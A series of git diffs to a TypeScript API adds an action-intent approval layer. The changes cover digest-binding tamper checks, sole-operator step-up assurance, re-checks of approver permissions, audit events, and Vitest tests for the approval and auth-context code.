+  it('denying an intent-linked row transitions the intent to rejected, expires siblings, and writes NO outbox row', async () => {
+    mockDecideWithIntent({ requestedByUserId: 'requester-1' });
+    const { siblingSet, tx } = mockIntentFanInTx();
+
+    const res = await buildApp().request('/approvals/appr-1/deny', {
+      method: 'POST',
+      headers: { 'content-type': 'application/json' },
+      body: JSON.stringify({ reason: 'not needed' }),
+    });
+    expect(res.status).toBe(200);
+
+    expect(transitionIntent).toHaveBeenCalledWith(
+      'intent-1',
+      'pending_approval',
+      'rejected',
+      expect.anything(),
+    );
+    expect(siblingSet).toHaveBeenCalledWith(
+      expect.objectContaining({ status: 'expired' }),
+    );
+    expect(tx.insert).not.toHaveBeenCalled();
+    expect(recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ outcome: 'rejected' }),
+    );
+  });
+
+  it('sole-operator self-approval below L3 assurance is refused with step_up_required and never touches the intent', async () => {
+    // Default assurance mock resolves decidedAssuranceLevel: 1 (session_tap).
+    mockDecideWithIntent({ requestedByUserId: TEST_USER.id });
+
+    const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
+    expect(res.status).toBe(403);
+    const body = await res.json();
+    expect(body.error).toBe('step_up_required');
+    expect(body.requiredLevel).toBe(3);
+    expect(transitionIntent).not.toHaveBeenCalled();
+    expect(db.transaction).not.toHaveBeenCalled();
+  });
+
+  it('sole-operator self-approval at L3+ assurance succeeds and audits self_approved_sole_operator', async () => {
+    mockDecideWithIntent({ requestedByUserId: TEST_USER.id });
+    vi.mocked(assertApprovalAssurance).mockResolvedValueOnce({
+      requiredLevel: 3,
+      decidedAssuranceLevel: 3,
+      decidedVia: 'webauthn_platform',
+      authenticatorDeviceId: 'dev-1',
+    });
+    mockIntentFanInTx();
+
+    const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
+    expect(res.status).toBe(200);
+    expect(transitionIntent).toHaveBeenCalledWith(
+      'intent-1',
+      'pending_approval',
+      'approved',
+      expect.objectContaining({ decidedAssuranceLevel: 3 }),
+    );
+    expect(recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({ outcome: 'self_approved_sole_operator' }),
+    );
+  });
+
+  it('refuses the decision when bound_argument_digest no longer matches the intent (digest_mismatch)', async () => {
+    mockDecideWithIntent({ boundArgumentDigest: 'stale-digest', intentDigest: 'digest-abc' });
+
+    const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
+    expect(res.status).toBe(409);
+    const body = await res.json();
+    expect(body.error).toBe('digest_mismatch');
+    expect(transitionIntent).not.toHaveBeenCalled();
+    expect(db.transaction).not.toHaveBeenCalled();
+  });
+
+  it('first-wins: a decide arriving after the intent already moved is a no-op but still 200s for this row', async () => {
+    mockDecideWithIntent({ requestedByUserId: 'requester-1' });
+    vi.mocked(transitionIntent).mockResolvedValueOnce(false);
+
+    const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
+    expect(res.status).toBe(200);
+    expect(db.transaction).not.toHaveBeenCalled();
+    expect(recordActionIntentEvent).not.toHaveBeenCalled();
+  });
+
+  it('a non-intent-linked decide never touches the intent transition path (regression)', async () => {
+    const plainRow = {
+      id: 'a1',
+      userId: TEST_USER.id,
+      requestingClientLabel: 'Claude Desktop',
+      requestingMachineLabel: null,
+      requestingClientId: null,
+      requestingSessionId: null,
+      actionLabel: 'x',
+      actionToolName: 'y',
+      actionArguments: {},
+      riskTier: 'low',
+      riskSummary: 'z',
+      status: 'approved',
+      expiresAt: new Date(Date.now() + 60_000),
+      decidedAt: new Date(),
+      decisionReason: null,
+      executionId: null,
+      elevationRequestId: null,
+      intentId: null,
+      createdAt: new Date(),
+    };
+    const set = mockDecideFlow({
+      existing: { ...plainRow, status: 'pending' },
+      updateReturns: [plainRow],
+    });
+
+    const res = await buildApp().request('/approvals/a1/approve', { method: 'POST' });
+    expect(res.status).toBe(200);
+    expect(set).toHaveBeenCalled();
+    expect(transitionIntent).not.toHaveBeenCalled();
+    expect(recordActionIntentEvent).not.toHaveBeenCalled();
+    // Only the pre-fetch + CAS selects/updates ran — no intent load select.
+    expect(vi.mocked(db.select)).toHaveBeenCalledTimes(1);
   });
 });
 

--- a/apps/api/src/routes/approvals.test.ts
+++ b/apps/api/src/routes/approvals.test.ts
@@ -1353,7 +1353,7 @@ describe('Task 5: decide-handler bound to action_intents', () => {
     );
   });
 
-  it('refuses the decision when bound_argument_digest no longer matches the intent (digest_mismatch)', async () => {
+  it('refuses the decision when bound_argument_digest no longer matches the intent (digest_mismatch) and audits it', async () => {
     mockDecideWithIntent({ boundArgumentDigest: 'stale-digest', intentDigest: 'digest-abc' });
 
     const res = await buildApp().request('/approvals/appr-1/approve', { method: 'POST' });
@@ -1362,6 +1362,21 @@ describe('Task 5: decide-handler bound to action_intents', () => {
     expect(body.error).toBe('digest_mismatch');
     expect(transitionIntent).not.toHaveBeenCalled();
     expect(db.transaction).not.toHaveBeenCalled();
+    expect(recordActionIntentEvent).toHaveBeenCalledWith(
+      expect.objectContaining({
+        orgId: 'org-9',
+        intentId: 'intent-1',
+        actionName: 'y',
+        argumentDigest: 'digest-abc',
+        source: 'mcp_api',
+        outcome: 'digest_mismatch',
+        actorId: TEST_USER.id,
+        details: expect.objectContaining({
+          approvalId: 'appr-1',
+          boundArgumentDigest: 'stale-digest',
+        }),
+      }),
+    );
   });
 
   it('first-wins: a decide arriving after the intent already moved is a no-op but still 200s for this row', async () => {

--- a/apps/api/src/routes/approvals.ts
+++ b/apps/api/src/routes/approvals.ts
@@ -428,6 +428,24 @@ async function decideHandler(
       existing.boundArgumentDigest &&
       existing.boundArgumentDigest !== linkedIntent.argumentDigest
     ) {
+      // Tamper-detection tripwire: content changed after fan-out. Audit
+      // this refusal — the release worker audits the same condition
+      // (jobs/intentReleaseWorker.ts's `digest_mismatch` errorCode), and
+      // this decide-time refusal is equally security-relevant. Ids/digests
+      // only, never raw arguments (spec §3.2/§7).
+      recordActionIntentEvent({
+        orgId: linkedIntent.orgId,
+        intentId: linkedIntent.id,
+        actionName: linkedIntent.actionName,
+        argumentDigest: linkedIntent.argumentDigest,
+        source: linkedIntent.source,
+        outcome: 'digest_mismatch',
+        actorId: userId,
+        details: {
+          approvalId: existing.id,
+          boundArgumentDigest: existing.boundArgumentDigest,
+        },
+      });
       return c.json({ error: 'digest_mismatch' }, 409);
     }
   }

--- a/apps/api/src/routes/approvals.ts
+++ b/apps/api/src/routes/approvals.ts
@@ -10,9 +10,12 @@ import { elevationRequests, elevationAudit } from '../db/schema/elevations';
 import { aiToolExecutions, aiSessions } from '../db/schema/ai';
 import { delegantM365Connections } from '../db/schema/delegant';
 import { auditLogs } from '../db/schema/audit';
+import { actionIntents, intentOutbox, type ActionIntent, type ActionIntentStatus } from '../db/schema/actionIntents';
 import { dispatchApprovalPush } from '../services/expoPush';
 import { revokeUserOauthClient } from './lifecycle';
 import { assertApprovalAssurance, StepUpRequiredError, ReauthRequiredError } from '../services/authenticatorAssurance';
+import { transitionIntent } from '../services/actionIntents/intentService';
+import { recordActionIntentEvent } from '../services/actionIntents/metrics';
 import { generateApprovalAssertionOptions } from '../services/approverWebAuthn';
 import { issueMobileAssertionNonce } from '../services/mobileHwKey';
 import { requireCurrentPasswordStepUp, requireFreshMfaStepUp } from './auth/helpers';
@@ -395,6 +398,40 @@ async function decideHandler(
     return c.json({ error: 'Expired', finalStatus: 'expired' }, 410);
   }
 
+  // Action intents (spec docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md
+  // §4, §3.4): load the linked intent early so the digest-binding and
+  // sole-operator checks below can run BEFORE the approval CAS. System
+  // context, mirroring the elevation mirror's cross-row visibility need —
+  // action_intents is org-scoped (Shape 1) and we want this read to succeed
+  // regardless of the ambient request scope.
+  let linkedIntent: ActionIntent | null = null;
+  if (existing.intentId) {
+    linkedIntent = await runOutsideDbContext(() =>
+      withSystemDbAccessContext(async () => {
+        const [row] = await db
+          .select()
+          .from(actionIntents)
+          .where(eq(actionIntents.id, existing.intentId as string));
+        return row ?? null;
+      }),
+    );
+
+    if (!linkedIntent) {
+      // Should be unreachable (ON DELETE CASCADE removes this approval row
+      // along with its intent), but fail closed rather than proceed blind.
+      return c.json({ error: 'intent_not_found' }, 404);
+    }
+
+    // Digest binding (defense-in-depth, spec §3.3): refuse the decision if
+    // the intent's content changed since this row was fanned out.
+    if (
+      existing.boundArgumentDigest &&
+      existing.boundArgumentDigest !== linkedIntent.argumentDigest
+    ) {
+      return c.json({ error: 'digest_mismatch' }, 409);
+    }
+  }
+
   // Phase 2/3: verify an optional assertion proof. No proof → L1 session tap. A
   // presented-but-invalid proof throws → 401 (never silently L1). The L3 recency
   // clock is derived server-side from the consumed challenge (no param here);
@@ -425,6 +462,22 @@ async function decideHandler(
     }
     console.error('[approvals] assertion verification failed:', err);
     return c.json({ error: 'assertion_failed' }, 401);
+  }
+
+  // Sole-operator step-up (spec §1 / §4): a requester approving their OWN
+  // intent (the sole-operator single-row fan-out case) must present >= L3
+  // assurance (webauthn_platform or mobile_hw_key). Checked BEFORE the CAS
+  // so an under-assured self-approval never flips the row. Deny is
+  // unaffected — only an approve of one's own intent is gated.
+  if (
+    linkedIntent &&
+    status === 'approved' &&
+    linkedIntent.requestedByUserId === userId
+  ) {
+    const level = assurance.decidedAssuranceLevel ?? 0;
+    if (level < 3) {
+      return c.json({ error: 'step_up_required', requiredLevel: 3 }, 403);
+    }
   }
 
   const result = await db
@@ -573,6 +626,87 @@ async function decideHandler(
       } catch (err) {
         console.error('[approvals] Failed to expire sibling approvals:', err);
       }
+    }
+  }
+
+  // Action intents (spec §4 / §3.4): mirror the decision onto the linked
+  // action_intents row. First-wins CAS via transitionIntent — a lost race
+  // (another approver, the reaper, or a retry already decided the intent)
+  // is a clean no-op; this row's own decision already committed above, so
+  // the user's decide call still succeeds either way.
+  if (updated?.intentId && linkedIntent) {
+    const intentId = updated.intentId;
+    const intentTargetStatus: ActionIntentStatus = status === 'approved' ? 'approved' : 'rejected';
+    const soleOperatorApproval = status === 'approved' && linkedIntent.requestedByUserId === userId;
+
+    let wonIntent = false;
+    try {
+      wonIntent = await transitionIntent(intentId, 'pending_approval', intentTargetStatus, {
+        decidedAt: new Date(),
+        decidedByUserId: userId,
+        decidedAssuranceLevel: assurance.decidedAssuranceLevel,
+        decidedVia: assurance.decidedVia,
+      });
+    } catch (err) {
+      console.error('[approvals] Failed to transition linked action intent:', err);
+    }
+
+    if (wonIntent) {
+      // Best-effort, same posture as the elevation mirror above: the intent
+      // transition itself already committed (that's what "won" means), so a
+      // failure here — expiring sibling approval rows and/or writing the
+      // intent_approved outbox row — must not fail the user's decide call.
+      // MUST run in system scope: approval_requests is Shape-6
+      // (user-id-scoped), so sibling rows belong to OTHER approvers and are
+      // invisible to this approver's request context.
+      try {
+        await runOutsideDbContext(() =>
+          withSystemDbAccessContext(() =>
+            db.transaction(async (tx) => {
+              await tx
+                .update(approvalRequests)
+                .set({ status: 'expired', decidedAt: new Date() })
+                .where(
+                  and(
+                    eq(approvalRequests.intentId, intentId),
+                    eq(approvalRequests.status, 'pending'),
+                    ne(approvalRequests.id, updated.id),
+                  ),
+                );
+
+              if (status === 'approved') {
+                await tx.insert(intentOutbox).values({
+                  intentId,
+                  eventType: 'intent_approved',
+                  // Ids only, no argument content (spec §3.2).
+                  payload: { intentId, orgId: linkedIntent!.orgId },
+                });
+              }
+            }),
+          ),
+        );
+      } catch (err) {
+        console.error('[approvals] Failed post-decide intent fan-in (sibling expiry / outbox):', err);
+      }
+
+      recordActionIntentEvent({
+        orgId: linkedIntent.orgId,
+        intentId,
+        actionName: linkedIntent.actionName,
+        argumentDigest: linkedIntent.argumentDigest,
+        source: linkedIntent.source,
+        outcome: soleOperatorApproval
+          ? 'self_approved_sole_operator'
+          : status === 'approved'
+            ? 'approved'
+            : 'rejected',
+        actorId: userId,
+        details: {
+          approvalRequestId: updated.id,
+          decidedAssuranceLevel: assurance.decidedAssuranceLevel,
+          decidedVia: assurance.decidedVia,
+        },
+      });
     }
   }
 

--- a/apps/api/src/routes/approvals.ts
+++ b/apps/api/src/routes/approvals.ts
@@ -16,6 +16,7 @@ import { revokeUserOauthClient } from './lifecycle';
 import { assertApprovalAssurance, StepUpRequiredError, ReauthRequiredError } from '../services/authenticatorAssurance';
 import { transitionIntent } from '../services/actionIntents/intentService';
 import { recordActionIntentEvent } from '../services/actionIntents/metrics';
+import { getUserPermissions, userCanDecideApprovals, canAccessOrg } from '../services/permissions';
 import { generateApprovalAssertionOptions } from '../services/approverWebAuthn';
 import { issueMobileAssertionNonce } from '../services/mobileHwKey';
 import { requireCurrentPasswordStepUp, requireFreshMfaStepUp } from './auth/helpers';
@@ -307,6 +308,64 @@ approvalRoutes.post('/:id/report-suspicious', async (c) => {
         console.error('[approvals] report-suspicious: failed to mirror to ai_tool_executions:', err);
       }
     }
+
+    // Intent-backed rows (durable four-eyes path) carry `intentId`, not
+    // `executionId`. A suspicious report is a strong DENY, so it must reject the
+    // whole intent and expire every SIBLING approval row — otherwise the intent
+    // stays pending_approval and another approver's still-live row could approve
+    // the action the reporter just flagged as malicious. Mirrors the decide
+    // handler's fan-in (first-wins CAS + system-scope sibling expiry). Runs in
+    // system scope: action_intents is org-scoped and sibling approval_requests
+    // rows belong to OTHER approvers, invisible to this user's request context.
+    if (existing.intentId) {
+      const intentId = existing.intentId;
+      try {
+        const wonIntent = await transitionIntent(intentId, 'pending_approval', 'rejected', {
+          decidedAt: new Date(),
+          decidedByUserId: userId,
+        });
+        if (wonIntent) {
+          const [linkedIntent] = await runOutsideDbContext(() =>
+            withSystemDbAccessContext(async () => {
+              await db
+                .update(approvalRequests)
+                .set({ status: 'expired', decidedAt: new Date() })
+                .where(
+                  and(
+                    eq(approvalRequests.intentId, intentId),
+                    eq(approvalRequests.status, 'pending'),
+                    ne(approvalRequests.id, existing.id),
+                  ),
+                );
+              return db
+                .select({
+                  orgId: actionIntents.orgId,
+                  actionName: actionIntents.actionName,
+                  argumentDigest: actionIntents.argumentDigest,
+                  source: actionIntents.source,
+                })
+                .from(actionIntents)
+                .where(eq(actionIntents.id, intentId))
+                .limit(1);
+            }),
+          );
+          if (linkedIntent) {
+            recordActionIntentEvent({
+              orgId: linkedIntent.orgId,
+              intentId,
+              actionName: linkedIntent.actionName,
+              argumentDigest: linkedIntent.argumentDigest,
+              source: linkedIntent.source,
+              outcome: 'rejected',
+              actorId: userId,
+              details: { reportedSuspicious: true, approvalRequestId: existing.id },
+            });
+          }
+        }
+      } catch (err) {
+        console.error('[approvals] report-suspicious: failed to reject linked action intent:', err);
+      }
+    }
   }
 
   // Revoke the requesting OAuth client (grant + refresh tokens) for this user.
@@ -447,6 +506,48 @@ async function decideHandler(
         },
       });
       return c.json({ error: 'digest_mismatch' }, 409);
+    }
+
+    // Re-check the DECIDER's live authorization before an intent-backed
+    // APPROVE (spec §4). The fanned-out approval_requests row (Shape-6,
+    // user-id-scoped) is otherwise a durable bearer capability: it was created
+    // for a user who held approvals:decide over the intent's org at fan-out
+    // time (services/actionIntents/intentApprovers.ts), but nothing re-checks
+    // that they STILL hold it. An Org Admin demoted to a role without
+    // approvals:decide (while keeping org membership, so the row stays visible)
+    // could otherwise still approve and drive a release. Resolve current perms
+    // for the intent's org and fail closed. Gated to `approved` only: a deny is
+    // harmless (it cancels the action) and must stay available even to a
+    // demoted approver. Checked BEFORE the assurance proof below so a stale
+    // approver never even consumes a WebAuthn challenge. Uses system context so
+    // the org membership/role reads resolve regardless of ambient request
+    // scope (partner approvers have no organization_users row).
+    if (status === 'approved') {
+      const deciderPerms = await runOutsideDbContext(() =>
+        withSystemDbAccessContext(() =>
+          getUserPermissions(userId, {
+            partnerId: c.get('auth').partnerId ?? undefined,
+            orgId: linkedIntent!.orgId,
+          }),
+        ),
+      );
+      if (
+        !deciderPerms ||
+        !canAccessOrg(deciderPerms, linkedIntent.orgId) ||
+        !userCanDecideApprovals(deciderPerms)
+      ) {
+        recordActionIntentEvent({
+          orgId: linkedIntent.orgId,
+          intentId: linkedIntent.id,
+          actionName: linkedIntent.actionName,
+          argumentDigest: linkedIntent.argumentDigest,
+          source: linkedIntent.source,
+          outcome: 'approver_unauthorized',
+          actorId: userId,
+          details: { approvalId: existing.id },
+        });
+        return c.json({ error: 'forbidden' }, 403);
+      }
     }
   }
 

--- a/apps/api/src/routes/approvals.ts
+++ b/apps/api/src/routes/approvals.ts
@@ -778,6 +778,7 @@ function serialize(
     decidedAt: r.decidedAt?.toISOString() ?? null,
     decisionReason: r.decisionReason ?? null,
     executionId: r.executionId ?? null,
+    intentId: r.intentId ?? null,
     isRecursive: r.isRecursive,
     createdAt: r.createdAt.toISOString(),
   };

--- a/apps/api/src/routes/metrics.test.ts
+++ b/apps/api/src/routes/metrics.test.ts
@@ -130,6 +130,17 @@ describe('metrics routes', () => {
     expect(body).toContain('agent_heartbeat_total{status="success"} 0');
   });
 
+  it('registers the action-intents counter on the live registry', async () => {
+    const res = await app.request('/metrics', {
+      headers: { Authorization: 'Bearer token' }
+    });
+
+    expect(res.status).toBe(200);
+    const body = await res.text();
+    expect(body).toContain('# HELP breeze_action_intents_total');
+    expect(body).toContain('# TYPE breeze_action_intents_total counter');
+  });
+
   it('requires auth for metrics endpoints', async () => {
     const res = await app.request('/metrics');
     expect(res.status).toBe(401);

--- a/apps/api/src/routes/metrics.ts
+++ b/apps/api/src/routes/metrics.ts
@@ -34,6 +34,7 @@ import { setAbuseMetricsRecorder } from '../services/abuseMetrics';
 import { setProxyTrustMetricsRecorder } from '../services/clientIp';
 import { registerM365CustomerGraphReadPrometheusCounter } from '../services/m365ControlPlane/metrics';
 import { registerM365GraphReadActionPrometheusCounter } from '../services/m365ControlPlane/readActionMetrics';
+import { registerActionIntentPrometheusCounter } from '../services/actionIntents/metrics';
 
 export {
   recordBackupCommandTimeout,
@@ -90,6 +91,7 @@ let METRICS_SCRAPE_IP_ALLOWLIST = parseCsvSet(process.env.METRICS_SCRAPE_IP_ALLO
 const register = new Registry();
 registerM365CustomerGraphReadPrometheusCounter(register);
 registerM365GraphReadActionPrometheusCounter(register);
+registerActionIntentPrometheusCounter(register);
 
 const httpRequestsTotal = new Counter({
   name: 'http_requests_total',

--- a/apps/api/src/routes/permissionsCatalog.ts
+++ b/apps/api/src/routes/permissionsCatalog.ts
@@ -32,7 +32,8 @@ const RESOURCE_LABELS: Record<string, string> = {
   sso: 'Single Sign-On',
   topology: 'Network Topology',
   vulnerabilities: 'Vulnerabilities',
-  ai_sessions: 'AI Sessions'
+  ai_sessions: 'AI Sessions',
+  approvals: 'Approvals'
 };
 
 const ACTION_LABELS: Record<string, string> = {
@@ -48,7 +49,8 @@ const ACTION_LABELS: Record<string, string> = {
   send: 'Send',
   admin: 'Administer',
   accept_risk: 'Accept Risk',
-  read_all: 'Read All'
+  read_all: 'Read All',
+  decide: 'Decide'
 };
 
 // GET /permissions/catalog - Returns the authoritative list of assignable

--- a/apps/api/src/services/actionIntents/actorContext.test.ts
+++ b/apps/api/src/services/actionIntents/actorContext.test.ts
@@ -174,7 +174,9 @@ describe('buildAuthContextForIntent — user-owned intents', () => {
     const result = await buildAuthContextForIntent(baseIntent());
 
     expect(result).toBeNull();
-    expect(permState.getUserPermissions).toHaveBeenCalledWith('user-1', { orgId: 'org-1' });
+    // baseIntent() defaults partnerId to null → threaded through as
+    // undefined (CRITICAL-2b).
+    expect(permState.getUserPermissions).toHaveBeenCalledWith('user-1', { partnerId: undefined, orgId: 'org-1' });
   });
 
   it('builds an org-scoped AuthContext on the happy path', async () => {
@@ -209,6 +211,10 @@ describe('buildAuthContextForIntent — user-owned intents', () => {
     expect(result!.token.roleId).toBe('role-1');
     expect(result!.token.sub).toBe('user-1');
     expect(result!.token.scope).toBe('organization');
+    // CRITICAL-2b: intent.partnerId is threaded into getUserPermissions so a
+    // partner-scope requester's role (which lives in partner_users, not
+    // organization_users) can resolve at release time.
+    expect(permState.getUserPermissions).toHaveBeenCalledWith('user-1', { partnerId: 'partner-1', orgId: 'org-1' });
   });
 
   it('a fully unrestricted permission set (no allowedSiteIds) allows every site', async () => {

--- a/apps/api/src/services/actionIntents/actorContext.test.ts
+++ b/apps/api/src/services/actionIntents/actorContext.test.ts
@@ -1,0 +1,278 @@
+import { describe, it, expect, vi, beforeEach } from 'vitest';
+
+// ---------------------------------------------------------------------------
+// Hoisted shared mock state
+// ---------------------------------------------------------------------------
+
+const { schema, dbState, permState } = vi.hoisted(() => {
+  const col = (name: string) => ({ name });
+  const usersTbl = {
+    id: col('id'),
+    email: col('email'),
+    name: col('name'),
+    status: col('status'),
+    isPlatformAdmin: col('is_platform_admin'),
+  };
+  const apiKeysTbl = { id: col('id'), status: col('status') };
+
+  return {
+    schema: { usersTbl, apiKeysTbl },
+    dbState: {
+      selectUsersResults: [] as unknown[][],
+      selectApiKeysResults: [] as unknown[][],
+    },
+    permState: {
+      getUserPermissions: vi.fn(),
+    },
+  };
+});
+
+function resultBox(getResult: () => unknown) {
+  return {
+    limit: vi.fn(() => Promise.resolve(getResult())),
+  };
+}
+
+vi.mock('../../db', () => ({
+  db: {
+    select: vi.fn(() => ({
+      from: vi.fn((table: unknown) => ({
+        where: vi.fn(() => {
+          if (table === schema.usersTbl) {
+            return resultBox(() => dbState.selectUsersResults.shift() ?? []);
+          }
+          if (table === schema.apiKeysTbl) {
+            return resultBox(() => dbState.selectApiKeysResults.shift() ?? []);
+          }
+          throw new Error('unexpected select table in mock');
+        }),
+      })),
+    })),
+  },
+  withSystemDbAccessContext: vi.fn(async (fn: () => Promise<unknown>) => fn()),
+}));
+
+vi.mock('../../db/schema/users', () => ({ users: schema.usersTbl }));
+vi.mock('../../db/schema/apiKeys', () => ({ apiKeys: schema.apiKeysTbl }));
+
+vi.mock('../permissions', () => ({
+  getUserPermissions: permState.getUserPermissions,
+}));
+
+// Mock middleware/auth wholesale rather than importing it for real: auth.ts
+// pulls in jwt/tokenRevocation/tenantStatus/auditEvents/sentry/mfaPolicy/etc,
+// none of which are relevant to this unit test and several of which have
+// their own real-module side effects. buildOrgAccessClosures/siteAccessCheck
+// themselves are covered by auth.test.ts / auth.siteAccess.test.ts — this
+// test only needs to assert buildAuthContextForIntent WIRES the factories up
+// correctly, so a faithful-but-independent reimplementation is sufficient.
+vi.mock('../../middleware/auth', () => ({
+  buildOrgAccessClosures: vi.fn((accessibleOrgIds: string[] | null) => ({
+    orgCondition: vi.fn(() => ({ mock: 'orgCondition', accessibleOrgIds })),
+    canAccessOrg: (orgId: string) => !!accessibleOrgIds && accessibleOrgIds.includes(orgId),
+  })),
+  siteAccessCheck: vi.fn(
+    (allowedSiteIds?: string[]) => (siteId: string | null | undefined) => {
+      if (!allowedSiteIds) return true;
+      if (!siteId) return false;
+      return allowedSiteIds.includes(siteId);
+    },
+  ),
+}));
+
+vi.mock('drizzle-orm', () => ({
+  eq: vi.fn((...args: unknown[]) => ({ op: 'eq', args })),
+}));
+
+// ---------------------------------------------------------------------------
+// Import under test (after mocks)
+// ---------------------------------------------------------------------------
+
+import { buildAuthContextForIntent } from './actorContext';
+import type { ActionIntent } from '../../db/schema/actionIntents';
+
+function baseIntent(overrides: Partial<ActionIntent> = {}): ActionIntent {
+  return {
+    id: 'intent-1',
+    orgId: 'org-1',
+    partnerId: null,
+    requestedByUserId: 'user-1',
+    requestingApiKeyId: null,
+    source: 'chat',
+    requestingClientLabel: null,
+    actionName: 'run_script',
+    actionVersion: 1,
+    arguments: {},
+    argumentDigest: 'digest-1',
+    targetSummary: 'run_script(scriptId=abc)',
+    impactSummary: 'Runs a script',
+    reason: null,
+    riskTier: 3,
+    connectionId: null,
+    tenantId: null,
+    idempotencyKey: 'idem-1',
+    correlationId: 'corr-1',
+    status: 'executing',
+    createdAt: new Date(),
+    expiresAt: new Date(),
+    decidedAt: new Date(),
+    decidedByUserId: 'approver-1',
+    decidedAssuranceLevel: 1,
+    decidedVia: 'session_tap',
+    executedAt: null,
+    result: null,
+    errorCode: null,
+    ...overrides,
+  } as ActionIntent;
+}
+
+const activeUser = {
+  id: 'user-1',
+  email: 'requester@example.com',
+  name: 'Requester',
+  status: 'active',
+  isPlatformAdmin: false,
+};
+
+describe('buildAuthContextForIntent — user-owned intents', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    dbState.selectUsersResults.length = 0;
+    dbState.selectApiKeysResults.length = 0;
+  });
+
+  it('returns null when the user is not found', async () => {
+    dbState.selectUsersResults.push([]);
+
+    const result = await buildAuthContextForIntent(baseIntent());
+
+    expect(result).toBeNull();
+    expect(permState.getUserPermissions).not.toHaveBeenCalled();
+  });
+
+  it('returns null when the user is disabled', async () => {
+    dbState.selectUsersResults.push([{ ...activeUser, status: 'disabled' }]);
+
+    const result = await buildAuthContextForIntent(baseIntent());
+
+    expect(result).toBeNull();
+    expect(permState.getUserPermissions).not.toHaveBeenCalled();
+  });
+
+  it('returns null when the user is only invited (never completed setup)', async () => {
+    dbState.selectUsersResults.push([{ ...activeUser, status: 'invited' }]);
+
+    const result = await buildAuthContextForIntent(baseIntent());
+
+    expect(result).toBeNull();
+  });
+
+  it('returns null when getUserPermissions returns null (lost org access since creation)', async () => {
+    dbState.selectUsersResults.push([activeUser]);
+    permState.getUserPermissions.mockResolvedValueOnce(null);
+
+    const result = await buildAuthContextForIntent(baseIntent());
+
+    expect(result).toBeNull();
+    expect(permState.getUserPermissions).toHaveBeenCalledWith('user-1', { orgId: 'org-1' });
+  });
+
+  it('builds an org-scoped AuthContext on the happy path', async () => {
+    dbState.selectUsersResults.push([activeUser]);
+    permState.getUserPermissions.mockResolvedValueOnce({
+      permissions: [],
+      partnerId: null,
+      orgId: 'org-1',
+      roleId: 'role-1',
+      scope: 'organization',
+      allowedSiteIds: ['site-1'],
+    });
+
+    const result = await buildAuthContextForIntent(baseIntent({ partnerId: 'partner-1' }));
+
+    expect(result).not.toBeNull();
+    expect(result!.scope).toBe('organization');
+    expect(result!.orgId).toBe('org-1');
+    expect(result!.partnerId).toBe('partner-1');
+    expect(result!.accessibleOrgIds).toEqual(['org-1']);
+    expect(result!.canAccessOrg('org-1')).toBe(true);
+    expect(result!.canAccessOrg('org-2')).toBe(false);
+    expect(result!.allowedSiteIds).toEqual(['site-1']);
+    expect(result!.canAccessSite!('site-1')).toBe(true);
+    expect(result!.canAccessSite!('site-2')).toBe(false);
+    expect(result!.user).toEqual({
+      id: 'user-1',
+      email: 'requester@example.com',
+      name: 'Requester',
+      isPlatformAdmin: false,
+    });
+    expect(result!.token.roleId).toBe('role-1');
+    expect(result!.token.sub).toBe('user-1');
+    expect(result!.token.scope).toBe('organization');
+  });
+
+  it('a fully unrestricted permission set (no allowedSiteIds) allows every site', async () => {
+    dbState.selectUsersResults.push([activeUser]);
+    permState.getUserPermissions.mockResolvedValueOnce({
+      permissions: [],
+      partnerId: null,
+      orgId: 'org-1',
+      roleId: 'role-1',
+      scope: 'organization',
+    });
+
+    const result = await buildAuthContextForIntent(baseIntent());
+
+    expect(result!.allowedSiteIds).toBeUndefined();
+    expect(result!.canAccessSite!('any-site')).toBe(true);
+  });
+});
+
+describe('buildAuthContextForIntent — api-key-owned intents (Plan 2 not implemented)', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    dbState.selectUsersResults.length = 0;
+    dbState.selectApiKeysResults.length = 0;
+  });
+
+  it('returns null even when the api key is active — Plan 2 completes this branch', async () => {
+    dbState.selectApiKeysResults.push([{ id: 'key-1', status: 'active' }]);
+
+    const result = await buildAuthContextForIntent(
+      baseIntent({ requestedByUserId: null, requestingApiKeyId: 'key-1' }),
+    );
+
+    expect(result).toBeNull();
+    expect(permState.getUserPermissions).not.toHaveBeenCalled();
+  });
+
+  it('returns null when the api key is revoked', async () => {
+    dbState.selectApiKeysResults.push([{ id: 'key-1', status: 'revoked' }]);
+
+    const result = await buildAuthContextForIntent(
+      baseIntent({ requestedByUserId: null, requestingApiKeyId: 'key-1' }),
+    );
+
+    expect(result).toBeNull();
+  });
+
+  it('returns null when the api key is not found', async () => {
+    dbState.selectApiKeysResults.push([]);
+
+    const result = await buildAuthContextForIntent(
+      baseIntent({ requestedByUserId: null, requestingApiKeyId: 'key-1' }),
+    );
+
+    expect(result).toBeNull();
+  });
+});
+
+describe('buildAuthContextForIntent — malformed intent (neither actor set)', () => {
+  it('returns null and never queries the DB', async () => {
+    const result = await buildAuthContextForIntent(
+      baseIntent({ requestedByUserId: null, requestingApiKeyId: null }),
+    );
+
+    expect(result).toBeNull();
+  });
+});

--- a/apps/api/src/services/actionIntents/actorContext.test.ts
+++ b/apps/api/src/services/actionIntents/actorContext.test.ts
@@ -57,6 +57,24 @@ vi.mock('../../db/schema/apiKeys', () => ({ apiKeys: schema.apiKeysTbl }));
 
 vi.mock('../permissions', () => ({
   getUserPermissions: permState.getUserPermissions,
+  // Faithful reimplementation of the real canAccessOrg (permissions.ts) — the
+  // release-time org-access gate. org-scope perms match their own org; partner-
+  // scope perms honor all/none/selected; system scope is unrestricted.
+  canAccessOrg: (perms: {
+    scope: string;
+    orgId?: string | null;
+    orgAccess?: 'all' | 'selected' | 'none';
+    allowedOrgIds?: string[];
+  }, orgId: string) => {
+    if (perms.scope === 'organization') return perms.orgId === orgId;
+    if (perms.scope === 'partner') {
+      if (perms.orgAccess === 'all') return true;
+      if (perms.orgAccess === 'none') return false;
+      if (perms.orgAccess === 'selected') return perms.allowedOrgIds?.includes(orgId) ?? false;
+      return false;
+    }
+    return true;
+  },
 }));
 
 // Mock middleware/auth wholesale rather than importing it for real: auth.ts
@@ -177,6 +195,46 @@ describe('buildAuthContextForIntent — user-owned intents', () => {
     // baseIntent() defaults partnerId to null → threaded through as
